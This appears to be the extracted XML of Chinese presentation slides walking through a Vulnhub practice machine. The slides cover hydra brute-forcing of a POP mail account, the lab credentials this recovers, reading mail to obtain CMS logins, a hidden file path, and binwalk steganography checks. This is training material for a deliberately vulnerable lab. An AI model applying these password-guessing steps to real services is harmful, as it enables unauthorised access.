                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E54E635-CC34-481E-B886-ECEBB64B9C86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect t="437" r="57991" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="766454" y="1116656"/>
            <a:ext cx="6959993" cy="2135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图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13621FDE-1C81-434A-BFFA-900630CF4D29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect t="620" r="56560" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7192611" y="1435633"/>
            <a:ext cx="4423321" cy="4959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矩形 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E52E49BB-C383-466A-B0BD-10FE42D63609}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766454" y="3683621"/>
            <a:ext cx="5780386" cy="2237087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>暴力破解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>doak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>服务密码</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742950" lvl="1"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账号：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>doak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，密码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>goat</a:t>
            </a:r>
          </a:p>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读取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>服务邮件，得知其在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>CMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>系统的账号密码</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742950" lvl="1"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账号：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>dr_doak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，密码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4England!</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2850499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8FF2FF-E9AE-4239-AC98-75D539FD3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308" y="1587561"/>
            <a:ext cx="7906277" cy="4453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800" spc="300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Vulnhub</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CE47C1F-6B5B-4A9B-8AA9-C7AD6A903412}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9040332" y="1587561"/>
            <a:ext cx="2658141" cy="4453079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="447675">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>vulnhub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>是一个提供各种漏洞平台的综合靶场，可供下载多种虚拟机进行下载，本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>打开即可，像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82610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登录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" spc="300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>doak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>账号</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E1D4446-1B1E-4AAD-9E7C-93B36CBD1D5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="505794" y="924560"/>
            <a:ext cx="11180412" cy="6287447"/>
            <a:chOff x="-597473" y="271828"/>
            <a:chExt cx="11180412" cy="6287447"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="图片 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{529C3DE6-C453-4320-9484-15FCDEF35026}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId1"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId6"/>
            <a:srcRect l="44518" t="1" b="-8143"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2503714" y="271828"/>
              <a:ext cx="8079225" cy="6287447"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="图片 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF3D717B-5B67-4C4D-BB83-292464E6804F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId6"/>
            <a:srcRect r="78703"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="-597473" y="271828"/>
              <a:ext cx="3101187" cy="5814060"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{694EBFDB-1D35-4AE0-B31D-02F113C49837}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766454" y="4450680"/>
            <a:ext cx="4328060" cy="168308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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在右侧</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Private Files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>里面找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>s3cret.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>其声称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的秘密信息藏在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>/dir007key/for-007.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1420889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获取图片</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D90999B6-7293-4DC1-BE2F-FBE2F6860384}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="11422" r="17411"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="390710" y="924560"/>
            <a:ext cx="8420987" cy="5547718"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="内容占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C70A2B3C-B316-4222-B96F-B6572AC5AAD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect r="25118" b="42059"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5507377" y="4501853"/>
            <a:ext cx="6091894" cy="1970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3995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解析图片内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CD079F3-2734-4600-AF27-661B4165390D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6432701" y="1318674"/>
            <a:ext cx="5335594" cy="4997065"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">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华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9918E0DA-A60B-4CAD-BF90-49D2CA70B84D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6432701" y="1318675"/>
            <a:ext cx="5335594" cy="880756"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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40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binwalk </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4B773A3-BFE9-4A73-AB42-D9B5BA0E38BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6613392" y="2507249"/>
            <a:ext cx="4720920" cy="676945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>binwalk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最早用于做文件分析。往往用于判断文件中是否包含隐写文件。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
